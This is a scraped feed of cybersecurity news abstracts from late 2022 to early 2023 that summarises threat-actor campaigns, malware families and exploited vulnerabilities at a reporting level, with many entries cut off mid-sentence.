The Blackfly espionage group (aka APT41, Winnti Group, Bronze Atlas) has continued to mount attacks against targets in Asia and recently targeted two subsidiaries of an Asian conglomerate, likely attempting to steal intellectual propertyCyware
February 28, 2023
ChromeLoader Operators Hide Malware in VHD Files for Game Cracks Full Text
Abstract
Researchers spotted a new ChromeLoader malware campaign that is being propagated via VHD files named after popular games, such as ROBLOX, Elden Ring, Call of Duty, Pokemon, Animal Crossing, and others. x hijacks browser searches to show advertisements and later modifies the browser setting and coll ... Read MoreCyware
February 28, 2023
Clasiopa Group Uses Distinct Toolset to Targeting Asian Research Organizations Full Text
Abstract
A hacker group, dubbed Clasiopa by the analysts at Broadcom company Symantec, is reportedly launching attacks against organizations in the materials research sector. The group boasts a unique toolset, including the custom Atharvan backdoor. Criminals have also used modified versions of the publicly ... Read MoreCyware
February 27, 2023
Malicious actors push the limits of attack vectors Full Text
Abstract
The war in Ukraine has seen the emergence of new forms of cyberattacks, and hacktivists became savvier and more emboldened to deface sites, leak information, and execute DDoS attacks, according to Trellix.Cyware
February 23, 2023
New Hacking Cluster ‘Clasiopa’ Targeting Materials Research Organizations in Asia Full Text
Abstract
Materials research organizations in Asia have been targeted by a previously unknown threat actor using a distinct set of tools. Symantec, by Broadcom Software, is tracking the cluster under the moniker Clasiopa . The origins of the hacking group and its affiliations are currently unknown, but there are hints that suggest the adversary could have ties to India. This includes references to "SAPTARISHI-ATHARVAN-101" in a custom backdoor and the use of the password "iloveindea1998^_^" for a ZIP archive. It's worth noting that Saptarishi , meaning "Seven sages" in Sanskrit, refers to a group of seers who are revered in Hindu literature. Atharvan was an ancient Hindu priest and is believed to have co-authored one of the four Vedas , a collection of religious scriptures in Hinduism. "While these details could suggest that the group is based in India, it is also quite likely that the information was planted as false flags, with the password inThe Hacker News
February 22, 2023
Earth Kitsun Return to Target Selected Entities in China and Japan Full Text
Abstract
Trend Micro reported about a new threat actor that would drop a new backdoor dubbed WhiskerSpy. The cybercriminal group, tracked as Earth Kitsune, is a relatively new threat group that conducts watering hole attacks. The malware is delivered to users when they attempt to watch videos on attacker-co ... Read MoreCyware
February 22, 2023
Hydrochasma: New Threat Actor Targets Shipping Companies and Medical Labs in Asia Full Text
Abstract
Shipping companies and medical laboratories in Asia have been the subject of a suspected espionage campaign carried out by a never-before-seen threat actor dubbed Hydrochasma . The activity, which has been ongoing since October 2022, "relies exclusively on publicly available and living-off-the-land tools," Symantec, by Broadcom Software, said in a report shared with The Hacker News. There is no evidence available as yet to determine its origin or affiliation with known threat actors, but the cybersecurity company said the group may be having an interest in industry verticals that are involved in COVID-19-related treatments or vaccines. The standout aspects of the campaign is the absence of data exfiltration and custom malware, with the threat actor employing open source tools for intelligence gathering. By using already available tools, the goal, it appears, is to not only confuse attribution efforts, but also to make the attacks stealthier. The start of the infectionThe Hacker News
February 22, 2023
Threat Actors Adopt Havoc Framework for Post-Exploitation in Targeted Attacks Full Text
Abstract
An open source command-and-control (C2) framework known as Havoc is being adopted by threat actors as an alternative to other well-known legitimate toolkits like Cobalt Strike , Sliver , and Brute Ratel . Cybersecurity firm Zscaler said it observed a new campaign in the beginning of January 2023 targeting an unnamed government organization that utilized Havoc . "While C2 frameworks are prolific, the open-source Havoc framework is an advanced post-exploitation command-and-control framework capable of bypassing the most current and updated version of Windows 11 defender due to the implementation of advanced evasion techniques such as indirect syscalls and sleep obfuscation," researchers Niraj Shivtarkar and Niraj Shivtarkar said . The attack sequence documented by Zscaler begins with a ZIP archive that embeds a decoy document and a screen-saver file that's designed to download and launch the Havoc Demon agent on the infected host. Demon is the implant generated vThe Hacker News
February 16, 2023
Hackers Deploy MortalKombat Ransomware and Laplas Clipper Malware Full Text
Abstract
There’s a new financially motivated campaign utilizing MortalKombat ransomware and the Laplas clipper. While the former is a variant of the Xortist commodity ransomware, the latter is a cryptocurrency hijacker that monitors the Windows clipboard for crypto addresses. The campaign’s focus remained o ... Read MoreCyware
February 16, 2023
New Threat Actor WIP26 Targeting Telecom Service Providers in the Middle East Full Text
Abstract
Telecommunication service providers in the Middle East are being targeted by a previously undocumented threat actor as part of a suspected intelligence gathering mission. Cybersecurity firms SentinelOne and QGroup are tracking the activity cluster under the former's work-in-progress moniker WIP26 . "WIP26 relies heavily on public cloud infrastructure in an attempt to evade detection by making malicious traffic look legitimate," researchers Aleksandar Milenkoski, Collin Farr, and Joey Chen said in a report shared with The Hacker News. This includes the misuse of Microsoft 365 Mail, Azure, Google Firebase, and Dropbox for malware delivery, data exfiltration, and command-and-control (C2) purposes. The initial intrusion vector used in the attacks entails "precision targeting" of employees via WhatsApp messages that contain links to Dropbox links to supposedly benign archive files. The files, in reality, harbor a malware loader whose core feature is to deplThe Hacker News
February 15, 2023
Financially Motivated Threat Actor Strikes with New Ransomware and Clipper Malware Full Text
Abstract
A new financially motivated campaign that commenced in December 2022 has seen the unidentified threat actor behind it deploying a novel ransomware strain dubbed MortalKombat and a clipper malware known as Laplas. Cisco Talos said it "observed the actor scanning the internet for victim machines with an exposed remote desktop protocol (RDP) port 3389." The attacks, per the cybersecurity company, primarily focuses on individuals, small businesses, and large organizations located in the U.S., and to a lesser extent in the U.K., Turkey, and the Philippines. The starting point that kicks off the multi-stage attack chain is a phishing email bearing a malicious ZIP file that's used as a pathway to deliver either the clipper or the ransomware. In addition to using cryptocurrency-themed email lures impersonating CoinPayments, the threat actor is also known to erase infection markers in an attempt to cover its tracks. MortalKombat, first detected in January 2023, is capableThe Hacker News
February 13, 2023
New TA866 Threat Group Selectively Targets U.S. and German Organizations Full Text
Abstract
Proofpoint security experts uncovered a threat actor, tracked as TA886, infecting companies in the U.S. and Germany with the new WasabiSeed and Screenshotter malware. The custom malware can perform surveillance and steal data. Hackers push their malware via phishing emails that include Microsoft Pu ... Read MoreCyware
February 13, 2023
Hackers Create Malicious Dota 2 Game Modes to Secretly Access Players’ Systems Full Text
Abstract
An unknown threat actor created malicious game modes for the Dota 2 multiplayer online battle arena (MOBA) video game that could have been exploited to establish backdoor access to players' systems. The modes exploited a high-severity flaw in the V8 JavaScript engine tracked as CVE-2021-38003 (CVSS score: 8.8), which was exploited as a zero-day and addressed by Google in October 2021. "Since V8 was not sandboxed in Dota, the exploit on its own allowed for remote code execution against other Dota players," Avast researcher Jan Vojtěšek said in a report published last week. Following responsible disclosure to Valve, the game publisher shipped fixes on January 12, 2023, by upgrading the version of V8. Game modes are essentially custom capabilities that can either augment an existing title or offer completely new gameplay in a manner that deviates from the standard rules. While publishing a custom game mode to the Steam store includes a vetting process fromThe Hacker News
February 13, 2023
NewsPenguin Waddles into Pakistani Organizations Full Text
Abstract
A previously unknown threat group, named NewsPenguin, was found targeting organizations in Pakistan with the upcoming Pakistan International Maritime Expo & Conference (PIMEC-2023) as bait. The researchers stated that the goal of the cybercriminal group is solely focused on cyberespionage, with ... Read MoreCyware
February 13, 2023
Hackers Targeting U.S. and German Firms Monitor Victims’ Desktops with Screenshotter Full Text
Abstract
A previously unknown threat actor has been targeting companies in the U.S. and Germany with bespoke malware designed to steal confidential information. Enterprise security company Proofpoint, which is tracking the activity cluster under the name Screentime , said the group, dubbed TA866 , is likely financially motivated. "TA866 is an organized actor able to perform well thought-out attacks at scale based on their availability of custom tools; ability and connections to purchase tools and services from other vendors; and increasing activity volumes," the company assessed . Campaigns mounted by the adversary are said to have commenced around October 3, 2022, with the attacks launched via emails containing a booby-trapped attachment or URL that leads to malware. The attachments range from macro-laced Microsoft Publisher files to PDFs with URLs pointing to JavaScript files. The intrusions have also leveraged conversation hijacking to entice recipients into clicking on seeThe Hacker News
February 11, 2023
Enigma, Vector, and TgToxic: The New Threats to Cryptocurrency Users Full Text
Abstract
Suspected Russian threat actors have been targeting Eastern European users in the crypto industry with fake job opportunities as bait to install information-stealing malware on compromised hosts. The attackers "use several highly obfuscated and under-development custom loaders in order to infect those involved in the cryptocurrency industry with Enigma stealer," Trend Micro researchers Aliakbar Zahravi and Peter Girnus said in a report this week. Enigma is said to be an altered version of Stealerium, an open source C#-based malware that acts as a stealer, clipper, and keylogger. The intricate infection journey starts with a rogue RAR archive file that's distributed via phishing or social media platforms. It contains two documents, one of which is a .TXT file that includes a set of sample interview questions related to cryptocurrency. The second file is a Microsoft Word document that, while serving as a decoy, is tasked with launching the first-stage Enigma loader,The Hacker News
February 11, 2023
Digital Rights Defenders Infiltrate Alleged Mercenary Hacking Group Full Text
Abstract
The EFF has been tracking Dark Caracal since 2015. In 2020, Quintin and EFF’s director of cybersecurity Eva Galperin published a report about a hacking campaign focused on Lebanese targets.Cyware
February 11, 2023
MagicWeb Mystery Highlights Nobelium Attacker’s Sophistication Full Text
Abstract
Microsoft has tracked down a sophisticated authentication bypass for Active Directory Federated Services (AD FS), pioneered by the Russia-linked Nobelium threat actor group.Cyware
February 10, 2023
North Korean Hackers Targeting Healthcare with Ransomware to Fund its Operations Full Text
Abstract
State-backed hackers from North Korea are conducting ransomware attacks against healthcare and critical infrastructure facilities to fund illicit activities, U.S. and South Korean cybersecurity and intelligence agencies warned in a joint advisory. The attacks, which demand cryptocurrency ransoms in exchange for recovering access to encrypted files, are designed to support North Korea's national-level priorities and objectives. This includes "cyber operations targeting the United States and South Korea governments — specific targets include Department of Defense Information Networks and Defense Industrial Base member networks," the authorities said . Threat actors with North Korea have been linked to espionage , financial theft , and cryptojacking operations for years, including the infamous WannaCry ransomware attacks of 2017 that infected hundreds of thousands of machines located in over 150 countries. Since then, North Korean nation-state crews have dabbledThe Hacker News
February 10, 2023
New TA886 group targets companies with custom Screenshotter malware Full Text
Abstract
The TA886 hacking group targets organizations in the United States and Germany with new spyware tracked as Screenshotter. A recently discovered threat actor, tracked as TA886 by security firm Proofpoint, is targeting organizations in the United States...Security Affairs
February 09, 2023
NewsPenguin Threat Actor Emerges with Malicious Campaign Targeting Pakistani Entities Full Text
Abstract
A previously unknown threat actor dubbed NewsPenguin has been linked to a phishing campaign targeting Pakistani entities by leveraging the upcoming international maritime expo as a lure. "The attacker sent out targeted phishing emails with a weaponized document attached that purports to be an exhibitor manual for PIMEC-23," the BlackBerry Research and Intelligence Team said . PIMEC , short for Pakistan International Maritime Expo and Conference, is an initiative of the Pakistan Navy and is organized by the Ministry of Maritime Affairs with an aim to "jump start development in the maritime sector." It's scheduled to be held from February 10-12, 2023. The Canadian cybersecurity company said the attacks are designed to target marine-related entities and the event's visitors by tricking the message recipients into opening the seemingly harmless Microsoft Word document. Once the document is launched, a method called remote template injection is employThe Hacker News
February 9, 2023
Scattered Spider Shifts Focus from BPOs and Telecos to IT and Gaming Companies Full Text
Abstract
A CrowdStrike report revealed that the Scattered Spider threat actors are still actively targeting video game and tech companies, after attacking 130 organizations in 2022. There are fake domains impersonating video game makers Roblox and Zynga; IT giants Intuit, Salesforce, Comcast, and Grubhub; a ... Read MoreCyware
February 9, 2023
NewsPenguin, a Previously Unknown Threat Actor, Targets Pakistan with Advanced Espionage Tool Full Text
Abstract
The Canadian cybersecurity company said the attacks are designed to target marine-related entities and the event's visitors by tricking the message recipients into opening the seemingly harmless Microsoft Word document.Cyware
February 03, 2023
Iranian OilRig Hackers Using New Backdoor to Exfiltrate Data from Govt. Organizations Full Text
Abstract
The Iranian nation-state hacking group known as OilRig has continued to target government organizations in the Middle East as part of a cyber espionage campaign that leverages a new backdoor to exfiltrate data. "The campaign abuses legitimate but compromised email accounts to send stolen data to external mail accounts controlled by the attackers," Trend Micro researchers Mohamed Fahmy, Sherif Magdy, and Mahmoud Zohdy said . While the technique in itself is not unheard of, the development marks the first time OilRig has adopted it in its playbook, indicating the continued evolution of its methods to bypass security protections. The advanced persistent threat (APT) group, also referred to as APT34, Cobalt Gypsy, Europium, and Helix Kitten, has been documented for its targeted phishing attacks in the Middle East since at least 2014. Linked to Iran's Ministry of Intelligence and Security (MOIS), the group is known to use a diverse toolset in its operations, with reThe Hacker News
February 02, 2023
North Korean Hackers Exploit Unpatched Zimbra Devices in ‘No Pineapple’ Campaign Full Text
Abstract
A new intelligence gathering campaign linked to the prolific North Korean state-sponsored Lazarus Group leveraged known security flaws in unpatched Zimbra devices to compromise victim systems. That's according to Finnish cybersecurity company WithSecure (formerly F-Secure), which codenamed the incident No Pineapple in reference to an error message that's used in one of the backdoors. Targets of the malicious operation included a healthcare research organization in India, the chemical engineering department of a leading research university, as well as a manufacturer of technology used in the energy, research, defense, and healthcare sectors, suggesting an attempt to breach the supply chain. Roughly 100GB of data is estimated to have been exported by the hacking crew following the compromise of an unnamed customer, with the digital break-in likely taking place in the third quarter of 2022. "The threat actor gained access to the network by exploiting a vulnerable ZimbraThe Hacker News
February 01, 2023
Hackers Abused Microsoft’s “Verified Publisher” OAuth Apps to Hack Corporate Email Accounts Full Text
Abstract
Microsoft on Tuesday said it took steps to disable fake Microsoft Partner Network (MPN) accounts that were used for creating malicious OAuth applications as part of a malicious campaign designed to breach organizations' cloud environments and steal email. "The applications created by these fraudulent actors were then used in a consent phishing campaign, which tricked users into granting permissions to the fraudulent apps," the tech giant said . "This phishing campaign targeted a subset of customers primarily based in the U.K. and Ireland." Consent phishing is a social engineering attack wherein users are tricked into granting permissions to malicious cloud applications, which can then be weaponized to gain access to legitimate cloud services and sensitive user data. The Windows maker said it became aware of the campaign on December 15, 2022. It has since alerted affected customers via email, with the company noting that the threat actors abused the consThe Hacker News
January 31, 2023
Pro-Palestine hackers threaten Israeli chemical companies Full Text
Abstract
Threat actors are targeting Israeli chemical companies operating in the occupied territories, security experts warn. Threat actors have launched a massive hacking campaign aimed at Israeli chemical companies operating in the occupied territories....Security Affairs
January 30, 2023
UNC2565 threat actors continue to improve the GOOTLOADER malware Full Text
Abstract
The threat actors behind the GOOTLOADER malware continues to improve their code by adding new components and implementing new obfuscation techniques. Mandiant researchers reported that the UNC2565 group behind the GOOTLOADER malware (aka Gootkit)...Security Affairs
January 29, 2023
Pro-Russia group Killnet targets Germany due to its support to Ukraine Full Text
Abstract
Pro-Russia group Killnet launched last week DDoS attacks against the websites of German airports, administration bodies, and banks. The Pro-Russia group Killnet is behind the DDoS attacks that last week hit the websites of German airports, administration...Security Affairs
January 26,2023
Researchers Uncover Connection b/w Moses Staff and Emerging Abraham’s Ax Hacktivists Group Full Text
Abstract
New research has linked the operations of a politically motivated hacktivist group known as Moses Staff to another nascent threat actor named Abraham's Ax that emerged in November 2022. This is based on "several commonalities across the iconography, videography, and leak sites used by the groups, suggesting they are likely operated by the same entity," Secureworks Counter Threat Unit (CTU) said in a report shared with The Hacker News. Moses Staff, tracked by the cybersecurity firm under the moniker Cobalt Sapling , made its first appearance on the threat landscape in September 2021 with the goal of primarily targeting Israeli organizations. The geopolitical group is believed to be sponsored by the Iranian government and has since been linked to a string of espionage and sabotage attacks that make use of tools like StrifeWater RAT and open source utilities such as DiskCryptor to harvest sensitive information and lock victim data on infected hosts. The crThe Hacker News
January 25,2023
North Korean Hackers Turn to Credential Harvesting in Latest Wave of Cyberattacks Full Text
Abstract
A North Korean nation-state group notorious for crypto heists has been attributed to a new wave of malicious email attacks as part of a "sprawling" credential harvesting activity targeting a number of industry verticals, marking a significant shift in its strategy. The state-aligned threat actor is being tracked by Proofpoint under the name TA444 , and by the larger cybersecurity community as APT38, BlueNoroff , Copernicium, and Stardust Chollima. TA444 is "utilizing a wider variety of delivery methods and payloads alongside blockchain-related lures, fake job opportunities at prestigious firms, and salary adjustments to ensnare victims," the enterprise security firm said in a report shared with The Hacker News. The advanced persistent threat is something of an aberration among state-sponsored groups in that its operations are financially motivated and geared towards generating illicit revenue for the Hermit Kingdom. To that end, the attacks employ phishinThe Hacker News
January 25, 2023
DragonSpark threat actor avoids detection using Golang source code Interpretation Full Text
Abstract
Chinese threat actor tracked as DragonSpark targets organizations in East Asia with a Golang malware to evade detection. SentinelOne researchers spotted a Chinese-speaking actor, tracked as DragonSpark, that is targeting organizations in East Asia. The...Security Affairs
January 24,2023
Chinese Hackers Utilize Golang Malware in DragonSpark Attacks to Evade Detection Full Text
Abstract
Organizations in East Asia are being targeted by a likely Chinese-speaking actor dubbed DragonSpark while employing uncommon tactics to go past security layers. "The attacks are characterized by the use of the little known open source SparkRAT and malware that attempts to evade detection through Golang source code interpretation," SentinelOne said in an analysis published today. A striking aspect of the intrusions is the consistent use of SparkRAT to conduct a variety of activities, including stealing information, obtaining control of an infected host, or running additional PowerShell instructions. The threat actor's end goals remain unknown as yet, although espionage or cybercrime is likely to be the motive. DragonSpark's ties to China stem from the use of the China Chopper web shell to deploy malware – a widely used attack pathway among Chinese threat actors. Furthermore, not only do the open source tools used in the cyber assaults originate from developeThe Hacker News
January 23,2023
Threat Actors Turn to Sliver as Open Source Alternative to Popular C2 Frameworks Full Text
Abstract
The legitimate command-and-control (C2) framework known as Sliver is gaining more traction from threat actors as it emerges as an open source alternative to Cobalt Strike and Metasploit. The findings come from Cybereason, which detailed its inner workings in an exhaustive analysis last week. Sliver, developed by cybersecurity company BishopFox, is a Golang-based cross-platform post-exploitation framework that's designed to be used by security professionals in their red team operations. Its myriad features for adversary simulation – including dynamic code generation, in-memory payload execution, and process injection – have also made it an appealing tool for threat actors looking to gain elevated access to the target system upon gaining an initial foothold. In other words, the software is used as a second-stage to conduct next steps of the attack chain after already compromising a machine using one of the initial intrusion vectors such as spear-phishing or exploitatioThe Hacker News
January 23, 2023
Chinese Group Targeting Vulnerable Cloud Providers, Apps Full Text
Abstract
Cybersecurity researchers say a Chinese for-profit threat group tracked as 8220 Gang is targeting cloud providers and poorly secured applications with a custom-built crypto miner and IRC bot.Cyware
January 20, 2023
Chinese hackers used recently patched FortiOS SSL-VPN flaw as a zero-day in October Full Text
Abstract
An alleged Chinese threat actor was observed exploiting the recently patched CVE-2022-42475 vulnerability in FortiOS SSL-VPN. Researchers from Mandiant reported that suspected Chinese threat actors exploited the recently patched CVE-2022-42475 vulnerability...Security Affairs
January 19,2023
New Research Delves into the World of Malicious LNK Files and Hackers Behind Them Full Text
Abstract
Cybercriminals are increasingly leveraging malicious LNK files as an initial access method to download and execute payloads such as Bumblebee, IcedID, and Qakbot. A recent study by cybersecurity experts has shown that it is possible to identify relationships between different threat actors by analyzing the metadata of malicious LNK files, uncovering information such as the specific tools and techniques used by different groups of cybercriminals, as well as potential links between seemingly unrelated attacks. "With the increasing usage of LNK files in attack chains, it's logical that threat actors have started developing and using tools to create such files," Cisco Talos researcher Guilherme Venere said in a report shared with The Hacker News. This comprises tools like NativeOne 's mLNK Builder and Quantum Builder , which allow subscribers to generate rogue shortcut files and evade security solutions. Some of the major malware families that have used LNK fileThe Hacker News
January 17,2023
Hackers Can Abuse Legitimate GitHub Codespaces Feature to Deliver Malware Full Text
Abstract
New research has found that it is possible for threat actors to abuse a legitimate feature in GitHub Codespaces to deliver malware to victim systems. GitHub Codespaces is a cloud-based configurable development environment that allows users to debug, maintain, and commit changes to a given codebase from a web browser or via an integration in Visual Studio Code. It also comes with a port forwarding feature that makes it possible to access a web application that's running on a particular port within the codespace directly from the browser on a local machine for testing and debugging purposes. "You can also forward a port manually, label forwarded ports, share forwarded ports with members of your organization, share forwarded ports publicly, and add forwarded ports to the codespace configuration," GitHub explains in its documentation. It's important to note here that any forwarded port that's made public will also permit any party with knowledge of the URLThe Hacker News
January 13, 2023
Pro-Russia group NoName057(16) targets Ukraine and NATO countries Full Text
Abstract
A Pro-Russian group named NoName057(16) is targeting organizations in Ukraine and NATO countries with DDoS attacks. A Pro-Russian cybercrime group named NoName057(16) (aka 05716nnm or Nnm05716) is behind a wave of DDoS attacks against organizations...Security Affairs
January 10,2023
StrongPity Hackers Distribute Trojanized Telegram App to Target Android Users Full Text
Abstract
The advanced persistent threat (APT) group known as StrongPity has targeted Android users with a trojanized version of the Telegram app through a fake website that impersonates a video chat service called Shagle . "A copycat website, mimicking the Shagle service, is used to distribute StrongPity's mobile backdoor app," ESET malware researcher Lukáš Štefanko said in a technical report. "The app is a modified version of the open source Telegram app, repackaged with StrongPity backdoor code." StrongPity , also known by the names APT-C-41 and Promethium, is a cyberespionage group active since at least 2012, with a majority of its operations focused on Syria and Turkey. The existence of the group was first publicly reported by Kaspersky in October 2016. The threat actor's campaigns have since expanded to encompass more targets across Africa, Asia, Europe, and North America, with the intrusions leveraging watering hole attacks and phishing messages to acThe Hacker News
January 9, 2023
Automated Libra Group Adopts New Tricks For Long Running Campaign Full Text
Abstract
Automated Libra, a South African threat actor, has improved its technique that includes leveraging cloud platform resources for cryptocurrency mining. The group has been evolving its capabilities with CAPTCHA bypass and Play and Run techniques to abuse free cloud resources. Users are suggested to a ... Read MoreCyware
January 09,2023
Hackers Can Abuse Visual Studio Marketplace to Target Developers with Malicious Extensions Full Text
Abstract
A new attack vector targeting the Visual Studio Code extensions marketplace could be leveraged to upload rogue extensions masquerading as their legitimate counterparts with the goal of mounting supply chain attacks. The technique "could act as an entry point for an attack on many organizations," Aqua security researcher Ilay Goldman said in a report published last week. VS Code extensions, curated via a marketplace made available by Microsoft, allow developers to add programming languages, debuggers, and tools to the VS Code source-code editor to augment their workflows. "All extensions run with the privileges of the user that has opened the VS Code without any sandbox," Goldman said, explaining the potential risks of using VS Code extensions. "This means that the extension can install any program on your computer including ransomwares, wipers, and more." To that end, Aqua found that not only is it possible for a threat actor to impersonate a poThe Hacker News
January 08,2023
Russian Turla Hackers Hijack Decade-Old Malware Infrastructure to Deploy New Backdoors Full Text
Abstract
The Russian cyberespionage group known as Turla has been observed piggybacking on attack infrastructure used by a decade-old malware to deliver its own reconnaissance and backdoor tools to targets in Ukraine. Google-owned Mandiant, which is tracking the operation under the uncategorized cluster moniker UNC4210 , said the hijacked servers correspond to a variant of a commodity malware called ANDROMEDA (aka Gamarue) that was uploaded to VirusTotal in 2013. "UNC4210 re-registered at least three expired ANDROMEDA command-and-control (C2) domains and began profiling victims to selectively deploy KOPILUWAK and QUIETCANARY in September 2022," Mandiant researchers said in an analysis published last week. Turla, also known by the names Iron Hunter, Krypton, Uroburos, Venomous Bear, and Waterbug, is an elite nation-state outfit that primarily targets government, diplomatic, and military organizations using a large set of custom malware. Since the onset of Russia's militThe Hacker News
January 7, 2023
Reuters: Russian hackers targeted U.S. nuclear scientists Full Text
Abstract
A Russian hacking team known as Cold River targeted three nuclear research laboratories in the United States this past summer, according to internet records reviewed by Reuters and five cyber security experts.Cyware
January 6, 2023
Russian Turla Cyberspies Leveraged Other Hackers’ USB-Delivered Malware Full Text
Abstract
Active since at least 2006 and linked to the Russian government, the cyberespionage group is also tracked as Snake, Venomous Bear, Krypton, and Waterbug, and has been historically associated with the use of the ComRAT malware.Cyware
January 05,2023
Blind Eagle Hackers Return with Refined Tools and Sophisticated Infection Chain Full Text
Abstract
A financially motivated threat actor tracked as Blind Eagle has resurfaced with a refined toolset and an elaborate infection chain as part of its attacks targeting organizations in Colombia and Ecuador. Check Point's latest research offers new insights into the Spanish-speaking group's tactics and techniques, including the use of sophisticated tools and government-themed lures to activate the killchain. Also tracked under the name APT-C-36, Blind Eagle is notable for its narrow geographical focus and launching indiscriminate attacks against South American nations since at least 2018. Blind Eagle's operations have been documented by Trend Micro in September 2021, uncovering a spear-phishing campaign primarily aimed at Colombian entities designed to deliver a commodity malware known as BitRAT , with a lesser focus towards targets in Ecuador, Spain, and Panama. Attacks chains commence with phishing emails containing a booby-trapped link that, when clicked, leads tThe Hacker News
January 5, 2023
How hackers might be exploiting ChatGPT Full Text
Abstract
The popular AI chatbot ChatGPT might be used by threat actors to hack easily hack into target networks. Original post at https://cybernews.com/security/hackers-exploit-chatgpt/ Cybernews research team discovered that the AI-based chatbot ChatGPT...Security Affairs
January 5, 2023
Hackers Using a New Undetectable SaaS-to-SaaS Phishing Technique Full Text
Abstract
Besides email, hackers are now shifting toward other delivery methods such as video conferencing platforms, workforce messaging apps, cloud-based file-sharing platforms, and SMSs. Hackers are actively using multi-stage cloud phishing techniques that combine traditional phishing with second-phase or ... Read MoreCyware
January 03,2023
Hackers Using Stolen Bank Information to Trick Victims into Downloading BitRAT Malware Full Text
Abstract
A new malware campaign has been observed using sensitive information stolen from a bank as a lure in phishing emails to drop a remote access trojan called BitRAT . The unknown adversary is believed to have hijacked the IT infrastructure of a Colombian cooperative bank, using the information to craft convincing decoy messages to lure victims into opening suspicious Excel attachments. The discovery comes from cybersecurity firm Qualys, which found evidence of a database dump comprising 418,777 records that's said to have been obtained by exploiting SQL injection faults. The leaked details include Cédula numbers (a national identity document issued to Colombian citizens), email addresses, phone numbers, customer names, payment records, salary details, and addresses, among others. There are no signs that the information has been previously shared on any forums in the darknet or clear web, suggesting that the threat actors themselves got access to customer data to mount the phiThe Hacker News
January 3, 2023
Hackers Celebrated Chrismas Week with Malicious PyTorch Dependency Full Text
Abstract
PyTorch team has identified a malicious dependency within its framework library. The package was the homonym for the torchtriton dependency. Exploiting it, a hacker could successfully trigger dependency confusion attacks, compromising multiple systems. PyTorch admins advised users to uninstall the ... Read MoreCyware
December 28, 2022
Hackers abuse Google Ads to spread malware in legit software Full Text
Abstract
Malware operators have been increasingly abusing the Google Ads platform to spread malware to unsuspecting users searching for popular software products.BleepingComputer
December 28, 2022
Hackers Target WordPress Gift Card Plugin to Upload Backdoors Full Text
Abstract
A critical vulnerability in the WordPress plugin YITH WooCommerce Gift Cards, which has over 50,000 worldwide installations. The bug, tracked as CVE-2022-45359, is being actively abused by threat actors. An unauthenticated hacker can upload files to vulnerable sites, completely taking over a compro ... Read MoreCyware
December 27, 2022
BlueNoroff Introduces New Methods Bypassing MoTW Full Text
Abstract
BlueNoroff group introduced new file types to evade Mark-of-the-Web (MOTW) security measures. It expanded file types and tweaked infection methods and, created numerous fake domains impersonating venture capital companies and banks.Cyware
December 26, 2022
IcedID Operators Abuse Google Ads in Malvertising Campaign Full Text
Abstract
Trend Micro noted a new distribution trend for the IcedID botnet via Google pay-per-click (PPC) ads, aka malvertising. The adversaries behind IcedID malware erected fake websites of legitimate organizations and well-known applications to lure online users. Attackers also drop a new loader via an MS ... Read MoreCyware
December 22, 2022
FIN7 hackers create auto-attack platform to breach Exchange servers Full Text
Abstract
The notorious FIN7 hacking group uses an auto-attack system that exploits Microsoft Exchange and SQL injection vulnerabilities to breach corporate networks, steal data, and select targets for ransomware attacks based on financial size.BleepingComputer
December 22, 2022
XLLing in Excel - threat actors using malicious add-ins Full Text
Abstract
Cisco Talos highlights a new vector for malicious code to Microsoft Excel—malicious add-ins, specifically XLL files. Although XLL files were supported since early Excel versions of Excel, malicious actors started using them relatively recently.Cyware
December 20, 2022
Russian hackers targeted petroleum refining company in NATO state Full Text
Abstract
A hacking group associated with Russia’s Federal Security Service (FSB) unsuccessfully attempted to compromise a large petroleum refining company within a NATO member state at the end of August, according to a new report.Cyware
December 15, 2022
Cyber warfare group caused AIIMS hack: sources - ET CISO Full Text
Abstract
A cyber warfare group backed by a “neighbouring” nation’s government was involved in the cyberattack on servers of the All India Institute of Medical Sciences (AIIMS), two sources aware of a government probe into the breach said.Cyware
December 15, 2022
Hackers target Japanese politicians with new MirrorStealer malware Full Text
Abstract
A hacking group tracked as MirrorFace has been targeting Japanese politicians for weeks before the House of Councilors election in July 2022, using a previously undocumented credentials stealer named 'MirrorStealer.'BleepingComputer
December 12, 2022
Evilnum group targets legal entities with a new Janicab variant Full Text
Abstract
A hack-for-hire group dubbed Evilnum is targeting travel and financial entities with the new Janicab malware variant. Kaspersky researchers reported that a hack-for-hire group dubbed Evilnum is targeting travel and financial entities. The attacks...Security Affairs
December 10, 2022
Hackers earn $989,750 for 63 zero-days exploited at Pwn2Own Toronto Full Text
Abstract
Pwn2Own Toronto 2022 has ended with competitors earning $989,750 for 63 zero-day exploits (and multiple bug collisions) targeting consumer products between December 6th and December 9th.BleepingComputer
December 05, 2022
Sneaky hackers reverse defense mitigations when detected Full Text
Abstract
A financially motivated threat actor is hacking telecommunication service providers and business process outsourcing firms, actively reversing defensive mitigations applied when the breach is detected.BleepingComputer
December 05, 2022
Hackers hijack Linux devices using PRoot isolated filesystems Full Text
Abstract
Hackers are abusing the open-source Linux PRoot utility in BYOF (Bring Your Own Filesystem) attacks to provide a consistent repository of malicious tools that work on many Linux distributions.BleepingComputer
Dec 02, 2022
Hackers Sign Android Malware Apps with Compromised Platform Certificates Full Text
Abstract
Platform certificates used by Android smartphone vendors like Samsung, LG, and MediaTek have been found to be abused to sign malicious apps. The findings were first discovered and reported by Google reverse engineer Łukasz Siewierski on Thursday. "A platform certificate is the application signing certificate used to sign the 'android' application on the system image," a report filed through the Android Partner Vulnerability Initiative ( AVPI ) reads . "The 'android' application runs with a highly privileged user id – android.uid.system – and holds system permissions, including permissions to access user data." This effectively means that a rogue application signed with the same certificate can gain the highest level of privileges as the Android operating system, permitting it to harvest all kinds of sensitive information from a compromised device. The list of malicious Android app packages that have abused the certificates is below - com.The Hacker News
December 02, 2022
BlackProxies proxy service increasingly popular among hackers Full Text
Abstract
A new residential proxy market is becoming popular among hackers, cybercriminals, phishers, scalpers, and scammers, selling access to a million claimed proxy IP addresses worldwide.BleepingComputer
Dec 02, 2022
Hackers Exploiting Redis Vulnerability to Deploy New Redigo Malware on Servers Full Text
Abstract
A previously undocumented Go-based malware is targeting Redis servers with the goal of taking control of the infected systems and likely building a botnet network. The attacks involve taking advantage of a critical security vulnerability in the open source, in-memory, key-value store that was disclosed earlier this year to deploy Redigo , according to cloud security firm Aqua . Tracked as CVE-2022-0543 (CVSS score: 10.0), the weakness pertains to a case of sandbox escape in the Lua scripting engine that could be leveraged to attain remote code execution. This is not the first time the flaw has come under active exploitation, what with Juniper Threat Labs uncovering attacks perpetrated by the Muhstik botnet in March 2022 to execute arbitrary commands. The Redigo infection chain is similar in that the adversaries scan for exposed Redis servers on port 6379 to establish initial access, following it up by downloading a shared library "exp_lin.so" from a remote server.The Hacker News
